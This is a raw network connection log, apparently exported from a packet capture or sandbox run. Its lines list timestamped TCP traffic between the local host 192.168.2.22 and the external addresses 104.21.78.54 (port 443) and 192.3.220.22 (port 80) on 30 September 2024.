                                                                            Sep 30, 2024 09:53:44.845347881 CEST49168443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:44.845747948 CEST49168443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:44.845763922 CEST44349168104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:47.083890915 CEST49169443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:47.083939075 CEST44349169104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:47.083992958 CEST49169443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:47.092753887 CEST49170443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:47.092763901 CEST44349170104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:47.092813015 CEST49170443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:47.100307941 CEST4917180192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:47.105216980 CEST8049171192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:47.105278015 CEST4917180192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:47.369509935 CEST49170443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:47.369538069 CEST44349170104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:47.444474936 CEST49169443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:47.444500923 CEST44349169104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:47.830732107 CEST44349170104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:47.830806017 CEST49170443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:47.835563898 CEST49170443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:47.835572004 CEST44349170104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:47.835865974 CEST44349170104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:47.835910082 CEST49170443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:47.902508974 CEST44349169104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:47.902591944 CEST49169443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:48.054207087 CEST49169443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:48.054223061 CEST44349169104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:48.054629087 CEST44349169104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:48.054693937 CEST49169443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:48.310926914 CEST49169443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:48.351449013 CEST44349169104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:49.562509060 CEST44349169104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:49.562570095 CEST49169443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:49.562587976 CEST44349169104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:49.562603951 CEST44349169104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:49.562640905 CEST49169443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:49.562830925 CEST49169443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:49.563885927 CEST49169443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:49.563906908 CEST44349169104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:49.564893007 CEST4917180192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:49.565068960 CEST4917280192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:49.573848009 CEST8049172192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:49.573913097 CEST4917280192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:49.574035883 CEST4917280192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:49.574204922 CEST8049171192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:49.574299097 CEST4917180192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:49.580837965 CEST8049172192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:49.642018080 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:50.060250044 CEST8049172192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:50.060314894 CEST4917280192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:55.070358992 CEST8049172192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:55.073546886 CEST4917280192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:56.363184929 CEST4917280192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:56.363255978 CEST49170443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:56:14.196527004 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.201555014 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.201699018 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.202555895 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.207359076 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.719575882 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.719618082 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.719635963 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.719649076 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.719660044 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.719666004 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.719671011 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.719676018 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.719677925 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.719687939 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.719702959 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.719716072 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.719716072 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.719716072 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.719716072 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.719727039 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.719742060 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.720621109 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.724667072 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.724698067 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.724731922 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.724783897 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.724816084 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.724817038 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.806391001 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.806407928 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.806430101 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.806442022 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.806449890 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.806456089 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.806469917 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.806483030 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.806484938 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.806484938 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.806497097 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.806499004 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.806509018 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.806533098 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.806533098 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.807321072 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.807333946 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.807346106 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.807364941 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.807391882 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.807404041 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.807404041 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.807405949 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.807419062 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.807430029 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.807440042 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.807451010 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.808284998 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.808298111 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.808310986 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.808329105 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.808339119 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.808346987 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.808351994 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.808367014 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.808377981 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.808387041 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.808399916 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.808410883 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.809284925 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.809298992 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.809312105 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.809329033 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.809339046 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.809350014 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.811244965 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.811261892 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.811285973 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.811299086 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.826986074 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.892986059 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893008947 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893022060 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893033981 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893045902 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893048048 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893065929 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893078089 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893078089 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893081903 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893090963 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893095016 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893106937 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893110037 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893117905 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893134117 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893145084 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893430948 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893445015 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893461943 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893471956 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893472910 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893490076 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893491030 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893508911 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893522978 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893769979 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893781900 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893793106 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893824100 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893824100 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893840075 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893857002 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893867970 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893874884 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893878937 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893882990 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893888950 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893891096 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893904924 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893904924 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.893913984 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893928051 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.893944025 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.894382000 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.894397974 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.894409895 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.894428015 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.894437075 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.894448996 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.894459009 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.894467115 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.894467115 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.894469976 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.894490004 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.894505024 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.894550085 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.894562960 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.894573927 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.894584894 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.894588947 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.894598007 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.894608021 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.894609928 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.894623041 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.894643068 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.894655943 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.894808054 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.895363092 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.895374060 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.895395041 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.895416975 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.895420074 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.895426989 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.895435095 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.895446062 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.895457983 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.895458937 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.895471096 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.895488024 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.895533085 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.895544052 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.895554066 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.895565033 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.895576000 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.895581007 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.895596981 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.895611048 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.895740986 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.898085117 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.898123980 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.979799986 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.979825974 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.979839087 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.979857922 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.979870081 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.979871035 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.979882002 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.979895115 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.979909897 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.979911089 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.979911089 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.979913950 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.979927063 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.979938984 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.979939938 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.979948997 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.979952097 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.979964018 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.979974031 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.979974031 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.979975939 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.979988098 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980000973 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980001926 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980017900 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980034113 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980119944 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980184078 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980226040 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980279922 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980323076 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980329037 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980340004 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980353117 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980364084 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980371952 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980391026 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980482101 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980494022 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980505943 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980529070 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980540991 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980557919 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980568886 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980580091 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980592012 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980602980 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980616093 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980616093 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980616093 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980616093 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980628967 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980638027 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980668068 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980679035 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980690002 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980700970 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980710983 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980715990 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980731010 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980746984 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980746984 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980756044 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980763912 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980772972 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980776072 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980787992 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980799913 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980802059 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980812073 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980814934 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980814934 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980823994 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980834007 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980837107 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.980844021 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980861902 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.980876923 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.981028080 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981040001 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981050968 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981076956 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.981092930 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.981122971 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981133938 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981143951 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981158018 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981163025 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.981177092 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.981190920 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.981261969 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981273890 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981286049 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981297016 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981307983 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981307983 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.981318951 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981319904 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.981331110 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981343985 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.981347084 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.981357098 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.981364012 CEST4917380192.168.2.22192.3.220.22
